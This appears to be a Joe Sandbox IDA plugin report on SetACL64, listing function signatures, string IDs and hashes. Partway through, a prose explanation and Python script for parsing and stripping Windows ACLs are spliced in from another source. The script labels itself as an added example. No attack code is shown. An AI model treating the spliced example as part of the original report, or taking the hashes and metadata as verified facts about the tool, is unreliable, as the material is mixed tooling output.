                                                  • API ID: try_get_function$Library$Load$AddressErrorFreeLastProc
                                                  • String ID: AreFileApisANSI$CompareStringEx$EnumSystemLocalesEx$GetDateFormatEx$GetLocaleInfoEx$GetTimeFormatEx$GetUserDefaultLocaleName$IsValidLocaleName$LCIDToLocaleName$LCMapStringEx$LocaleNameToLCID
                                                  • API String ID: 3255926029-3252031757
                                                  • Opcode ID: 9211e9d41fbef9106278706ba9ffd9f3a7d029d209f8dabeb844061a5d1a6813
                                                  • Instruction ID: dda93834399ea4f55fbf6d409dc141fef2ac1b7b1d438719afc7bed703b555ad
                                                  • Opcode Fuzzy Hash: 9211e9d41fbef9106278706ba9ffd9f3a7d029d209f8dabeb844061a5d1a6813
                                                  • Instruction Fuzzy Hash: EF312660908E47A1F706FF56E8516F4A332AB0C364FC09437D10D169A79FBCA68AC3B1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: " $AddTrusteesFromFile$Input file for trustee operation opened: '
                                                  • API String ID: 0-3105513592
                                                  • Opcode ID: cfcd9179b3afa49e84231abe562083495f775b235c5cd478525bc830438bbd8e
                                                  • Instruction ID: d3ba63d4f67677047ad29f7c406734e9729e6d01f8bb28768a649b90410a5bc5
                                                  • Opcode Fuzzy Hash: cfcd9179b3afa49e84231abe562083495f775b235c5cd478525bc830438bbd8e
                                                  • Instruction Fuzzy Hash: B4A19E32A28B5284F700AFA5E8943EDA371FB58358F905435DA4C579ABDFBCE181C760
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$CriticalSection$EnterLeave
                                                  • String ID: on $====================================================================$FileVersion$SetLogFile$Starting SetACL.exe
                                                  • API String ID: 363805048-2110037876
                                                  • Opcode ID: bfe008777ad23c9cdc2350b9679eda7746b6eef8af8c9e99fa761d27b66fba6f
                                                  • Instruction ID: c21c37464180961df1e7f76bfb7ef50d6800f9658bc5fe83bb084139e8491ad1
                                                  • Opcode Fuzzy Hash: bfe008777ad23c9cdc2350b9679eda7746b6eef8af8c9e99fa761d27b66fba6f
                                                  • Instruction Fuzzy Hash: CF226562B1874581FB00AF69E4493ADA361EB997F4F905235DA6C03AEBDFBCD184C710
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$ErrorLast$CreateDirectory
                                                  • String ID: ' could not be created because: $CreateDirectoryAPIWrapper$Created the directory '$Directory already exists: '$The directory '
                                                  • API String ID: 3201042626-1824261680
                                                  • Opcode ID: d1b5d7231ef0ce28a8e66e00800bd7d89ee647de3540f67a21a8ce9304b88add
                                                  • Instruction ID: bef6867152fe67ce1cf78c07798d50f54f9a124ed10f14aad5ca5dea5712e083
                                                  • Opcode Fuzzy Hash: d1b5d7231ef0ce28a8e66e00800bd7d89ee647de3540f67a21a8ce9304b88add
                                                  • Instruction Fuzzy Hash: 8B028362B58B4685FB04EF7AD4443AC6322AB497B8FC05231DA6C13AEADFBCD145C314
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$ErrorLastVersion
                                                  • String ID: Prepare$SetACL only supports Windows Vista and later.$The version of your operating system could not be determined.
                                                  • API String ID: 1165008562-2181592180
                                                  • Opcode ID: 727d599cbf774fd4c5ba4d8356de33424bd120d4bccaa165a2686ec5f0d8e0cb
                                                  • Instruction ID: 0ea0e8a5bf3077e0abf5ad88bfc4b2642cb328f52b407f69b2f9194e5c2c8b73
                                                  • Opcode Fuzzy Hash: 727d599cbf774fd4c5ba4d8356de33424bd120d4bccaa165a2686ec5f0d8e0cb
                                                  • Instruction Fuzzy Hash: 3B71C871A5978781EB00AF66E0843ADA321EB497B4F905531E65D03AEBCFFCE151CB10
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 3215553584-0
                                                  • Opcode ID: c5659fc54ca624ddf6d2490e80867d1b248a83083ebe8249bddcb2d4f27d4c86
                                                  • Instruction ID: a40fabca7492af1f7cdc2bc430f68b9eb86e15a7cdbc4b62a11754e0595ed385
                                                  • Opcode Fuzzy Hash: c5659fc54ca624ddf6d2490e80867d1b248a83083ebe8249bddcb2d4f27d4c86
                                                  • Instruction Fuzzy Hash: 21315321AAA75740FB00BFAAA0E93BD9126EF6D774FD01830D70C065D7CEACA151C624
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$Enum$CloseOpenResource
                                                  • String ID: > failed with: $GetUNCPathOfMappedDrive$Retrieving the remote path for mapped drive L<
                                                  • API String ID: 3788045339-1117730555
                                                  • Opcode ID: 26ce30747a7c3376bf249c0467c749ccf99a2e6852225826950c2a27f422109d
                                                  • Instruction ID: b3ea732363d7bd0766442469fa2f0cffcb18db2b9f283b96d9be61d4d21a0016
                                                  • Opcode Fuzzy Hash: 26ce30747a7c3376bf249c0467c749ccf99a2e6852225826950c2a27f422109d
                                                  • Instruction Fuzzy Hash: 40126162A1974181FB00AF6AE44436DA362EB887F4FD05235DB5D47AEADFBCE181C710
                                                  APIs
                                                  • IsValidAcl.ADVAPI32(?,?,?,?,?,?,00000000,00000000,?,?,00000000,00000000,?,?,00007FF7C17399CE), ref: 00007FF7C173A2F4
                                                  • GetAce.ADVAPI32(?,?,?,?,?,?,00000000,00000000,?,?,00000000,00000000,?,?,00007FF7C17399CE), ref: 00007FF7C173A30D
                                                  • DeleteAce.ADVAPI32(?,?,?,?,?,?,00000000,00000000,?,?,00000000,00000000,?,?,00007FF7C17399CE), ref: 00007FF7C173A338
                                                  • GetAclInformation.ADVAPI32(?,?,?,?,?,?,00000000,00000000,?,?,00000000,00000000,?,?,00007FF7C17399CE), ref: 00007FF7C173A354
                                                  • GetLengthSid.ADVAPI32(?,?,?,?,?,?,00000000,00000000,?,?,00000000,00000000,?,?,00007FF7C17399CE), ref: 00007FF7C173A361
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,?,?,00000000,00000000,?,?,00007FF7C17399CE), ref: 00007FF7C173A37F
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
• Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
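The API sequence recorded for the function above (IsValidAcl, GetAclInformation, GetAce, GetLengthSid, DeleteAce, GetLastError) is the standard pattern for removing entries from an ACL: validate the ACL, read its ACE count, fetch each ACE by index, compare the trustee SID, and delete the matching ones. The following Python is an added example, not code from this report, from the SetACL64 binary in the snapshot, or from the submitted sample. It builds a self-relative ACL in the exact byte layout those ADVAPI32 calls operate on, walks it the way GetAclInformation and GetAce do, and rebuilds it without the ACEs for one trustee, which is the net effect of the DeleteAce loop. The SIDs, access masks and ACE ordering are constructed sample values, and all function names are my own.

```python
import struct

# ACE type and ACL revision values from winnt.h; everything else below is
# constructed sample data for this added example, not data from the sample.
ACCESS_ALLOWED_ACE_TYPE = 0x00
ACCESS_DENIED_ACE_TYPE = 0x01
ACL_REVISION = 2
ACL_REVISION_DS = 4


def build_sid(identifier_authority, sub_authorities, revision=1):
    """Serialise a SID: Revision, SubAuthorityCount, 6-byte big-endian
    IdentifierAuthority, then little-endian DWORD sub-authorities.
    The result is exactly GetLengthSid() bytes long: 8 + 4 * count."""
    return (struct.pack("<BB", revision, len(sub_authorities))
            + identifier_authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in sub_authorities))


def sid_length(buf, off):
    """GetLengthSid equivalent: SubAuthorityCount lives at offset 1 of the SID."""
    return 8 + 4 * buf[off + 1]


def sid_to_string(sid):
    """Render a binary SID as S-R-A-S1-S2..., the ConvertSidToStringSid form."""
    revision, count = sid[0], sid[1]
    authority = int.from_bytes(sid[2:8], "big")
    subs = struct.unpack_from("<%dI" % count, sid, 8)
    return "S-%d-%d" % (revision, authority) + "".join("-%d" % s for s in subs)


def build_ace(ace_type, ace_flags, mask, sid):
    """ACCESS_ALLOWED_ACE / ACCESS_DENIED_ACE: ACE_HEADER (type, flags, size),
    ACCESS_MASK, then the trustee SID starting at SidStart."""
    size = 4 + 4 + len(sid)
    return struct.pack("<BBHI", ace_type, ace_flags, size, mask) + sid


def build_acl(aces, revision=ACL_REVISION):
    """ACL header: AclRevision, Sbz1, AclSize, AceCount, Sbz2 (8 bytes), then the ACEs."""
    body = b"".join(aces)
    return struct.pack("<BBHHH", revision, 0, 8 + len(body), len(aces), 0) + body


def parse_acl(acl):
    """Equivalent of IsValidAcl + GetAclInformation + one GetAce per index.
    Returns a list of (ace_type, ace_flags, mask, sid_string, raw_ace_bytes)."""
    revision, _sbz1, acl_size, ace_count, _sbz2 = struct.unpack_from("<BBHHH", acl, 0)
    # Sanity checks in the spirit of IsValidAcl: known revision, size fits the buffer.
    if revision not in (ACL_REVISION, ACL_REVISION_DS) or acl_size > len(acl):
        raise ValueError("invalid ACL header")
    aces, off = [], 8
    for _ in range(ace_count):
        ace_type, ace_flags, ace_size = struct.unpack_from("<BBH", acl, off)
        if ace_size < 8 or off + ace_size > acl_size:
            raise ValueError("ACE overruns ACL at offset %d" % off)
        mask, = struct.unpack_from("<I", acl, off + 4)
        sid = acl[off + 8: off + 8 + sid_length(acl, off + 8)]
        aces.append((ace_type, ace_flags, mask, sid_to_string(sid), acl[off: off + ace_size]))
        off += ace_size
    return aces


def delete_aces_for_sid(acl, sid_string):
    """Mirror of the GetAce / GetLengthSid / DeleteAce loop: drop every ACE whose
    trustee matches. DeleteAce compacts in place and only decrements AceCount;
    here the buffer is rebuilt, so AclSize shrinks as well."""
    keep = [raw for (_t, _f, _m, sid, raw) in parse_acl(acl) if sid != sid_string]
    return build_acl(keep, revision=acl[0])


# Constructed DACL: Administrators full control, Everyone denied WRITE_DAC,
# Everyone allowed read and execute. Masks are the generic file rights from winnt.h.
ADMINISTRATORS = build_sid(5, [32, 544])   # S-1-5-32-544
EVERYONE = build_sid(1, [0])               # S-1-1-0
SAMPLE_DACL = build_acl([
    build_ace(ACCESS_ALLOWED_ACE_TYPE, 0, 0x001F01FF, ADMINISTRATORS),
    build_ace(ACCESS_DENIED_ACE_TYPE, 0, 0x00040000, EVERYONE),
    build_ace(ACCESS_ALLOWED_ACE_TYPE, 0, 0x001200A9, EVERYONE),
])

if __name__ == "__main__":
    for ace in parse_acl(SAMPLE_DACL):
        print("type=%d flags=0x%02x mask=0x%08x sid=%s" % ace[:4])
    stripped = delete_aces_for_sid(SAMPLE_DACL, "S-1-1-0")
    print("after removing Everyone:", [a[3] for a in parse_acl(stripped)])
```

The bounds checks in parse_acl are the point of the IsValidAcl and GetLastError calls in the recorded sequence: an ACL read from a security descriptor is attacker-influenced data, and an AceSize that runs past AclSize must stop the walk rather than be trusted.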
                                                  Similarity
                                                  • API ID: DeleteErrorInformationLastLengthValid
                                                  • String ID:
                                                  • API String ID: 1967920013-0
                                                  • Opcode ID: fa47e8455b8d5f9eec009974956262ef4a7b95b3ec48f1941adf8a6189de3f14
                                                  • Instruction ID: 4164faf0b9df3911969512e91c2e6e535cd948e1383c6bd527af630d99ce75f3
                                                  • Opcode Fuzzy Hash: fa47e8455b8d5f9eec009974956262ef4a7b95b3ec48f1941adf8a6189de3f14
                                                  • Instruction Fuzzy Hash: DC819422B0C68282EB50BF23955523DB7A0BF99BA4F944035ED8E83796DFBCD4048721
Memory Dump Source
• Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
• Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: String$ArraySafe$AllocFree$BoundConcurrency::cancel_current_taskDataVariant$AccessClearInitUnaccess
                                                  • String ID: GetSD$__systemsecurity=@
                                                  • API String ID: 2119716662-3672729512
                                                  • Opcode ID: a4bc5dedb66d47c51631d50f3265cb4853a502811ef6be4f41ada5bd415db247
                                                  • Instruction ID: 89a7ce9fe4282842bff5e73d7913a07ea32c84d12b45e354925f98917b19ff41
                                                  • Opcode Fuzzy Hash: a4bc5dedb66d47c51631d50f3265cb4853a502811ef6be4f41ada5bd415db247
                                                  • Instruction Fuzzy Hash: 5F915232A09B4282EB54EF12E411379F3A4EF89BA0F944435DA4D83B96DFBDD544C760
Memory Dump Source
• Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
• Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                  • String ID: Prepare$The object type was not specified.
                                                  • API String ID: 3668304517-3861202280
                                                  • Opcode ID: f6146cc0b52683d5413a34b6f752e51676bb9cf189912ec02217d27d55aa915d
                                                  • Instruction ID: fcc4e7bedf506610f4495e0ea6a5a454b8372bea308d67155ed834ec87feb870
                                                  • Opcode Fuzzy Hash: f6146cc0b52683d5413a34b6f752e51676bb9cf189912ec02217d27d55aa915d
                                                  • Instruction Fuzzy Hash: 0931D721A6964781EB00BF66E0853AEA325EF593B4F901531E65C036EBCEBCD151CB14
Memory Dump Source
• Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
• Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$Lockitstd::_$Lockit::_Lockit::~_SetgloballocaleValidstd::locale::_
                                                  • String ID: > was not found in domain <$Account <$ProcessACEsOfGivenDomains
                                                  • API String ID: 2555488030-3371799133
                                                  • Opcode ID: 466707cee54b4337e627ad1c5b082164c4624fdca99e4cbe8ccd6642e64db4c1
                                                  • Instruction ID: 5942aa49ac364bbfadb9760686cad4fad086d80cf9e47f93614730484d957f08
                                                  • Opcode Fuzzy Hash: 466707cee54b4337e627ad1c5b082164c4624fdca99e4cbe8ccd6642e64db4c1
                                                  • Instruction Fuzzy Hash: 15029472A15B4185FB00EF66E4443ADA761EB987B8F905235DA5D03BE6DFBCE180C310
Memory Dump Source
• Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
• Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: ObjectSingleWait$EventMutexReleaseReset
                                                  • String ID:
                                                  • API String ID: 4195719913-0
                                                  • Opcode ID: 53c02e3128979e1348d48c8753feaf8a9deea66a6de0b7d4b8ab2bd848f986ba
                                                  • Instruction ID: 1a6b623b35dda5394d857e541c5631c010eb6ddb2f6c738f6336e0fb2d83d285
                                                  • Opcode Fuzzy Hash: 53c02e3128979e1348d48c8753feaf8a9deea66a6de0b7d4b8ab2bd848f986ba
                                                  • Instruction Fuzzy Hash: EBB1AF32A18BC185EB21AF66D8483ED6361FB4D7A8F915231DA5C477E6DFB8D680C310
Memory Dump Source
• Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
• Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
                                                  • String ID: AddACE$Audit ACEs cannot be set on shares.$Invalid access mode for this ACL type specified (e.g. you cannot add audit ACEs to the DACL, only to the SACL).$Invalid inheritance specified.$No trustee specified.
                                                  • API String ID: 3936042273-1410195417
                                                  • Opcode ID: c4ff67e74c09a2f73a2b1b69ce317e7775f2c5bfd494f419ddfd883c6a867768
                                                  • Instruction ID: e8c0cbd7d2a01c7e9b4fb66ad3816419303b4b27ff8e89338afee6fb1681cd76
                                                  • Opcode Fuzzy Hash: c4ff67e74c09a2f73a2b1b69ce317e7775f2c5bfd494f419ddfd883c6a867768
                                                  • Instruction Fuzzy Hash: 91229272A1874285EB00EF6AE4483ADB371FB48768FD04135D68C57A9ADFBCE585C720
Memory Dump Source
• Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
• Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                  • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                  • API String ID: 2565136772-3242537097
                                                  • Opcode ID: a89e39b1e6dab9013fa2c69796a28cd76b0915c44a41f147d36bdeccd3bdc5f6
                                                  • Instruction ID: fc92e78b88846c09326e1a200fe821bcc96b62f038c94c06e6226d33ed5ea0e5
                                                  • Opcode Fuzzy Hash: a89e39b1e6dab9013fa2c69796a28cd76b0915c44a41f147d36bdeccd3bdc5f6
                                                  • Instruction Fuzzy Hash: 9F21D831A1AA0391FB56FF23B854578A3A0AF4D7B0FD44435C90E436A6EFACE4598730
Memory Dump Source
• Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
• Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                  • String ID: > is probably incorrect.$AddDomain$Domain name <
                                                  • API String ID: 3668304517-3402377043
                                                  • Opcode ID: 331517c9e7e271e5a7fd40b88897b6cbc41d5860be722eeb7a384d55d81c47f0
                                                  • Instruction ID: d62f6689594a65b0513e8ed532ec216e3d8130a7a17859422baa4367db41ef5f
                                                  • Opcode Fuzzy Hash: 331517c9e7e271e5a7fd40b88897b6cbc41d5860be722eeb7a384d55d81c47f0
                                                  • Instruction Fuzzy Hash: C3D15272B1574185EB04EF6AE4483AD6322EB487A4F905235EB5C47AEADFBCE191C310
Memory Dump Source
• Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
• Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$ConvertFreeLocalString
                                                  • String ID:
                                                  • API String ID: 347880976-0
                                                  • Opcode ID: 7f36a04dbe1e1195e17bb9c4e0bc062f01be79f362d0442487ffcee1471e9626
                                                  • Instruction ID: 9befd4124bf4c6640bcd574fdac55f4eb842aece975ea2331397945b316062a4
                                                  • Opcode Fuzzy Hash: 7f36a04dbe1e1195e17bb9c4e0bc062f01be79f362d0442487ffcee1471e9626
                                                  • Instruction Fuzzy Hash: 9D228262A18B8185FB009F65E4443ADA771FB493B8F905235DF9C13AAADFB8E194C710
Memory Dump Source
• Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
• Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
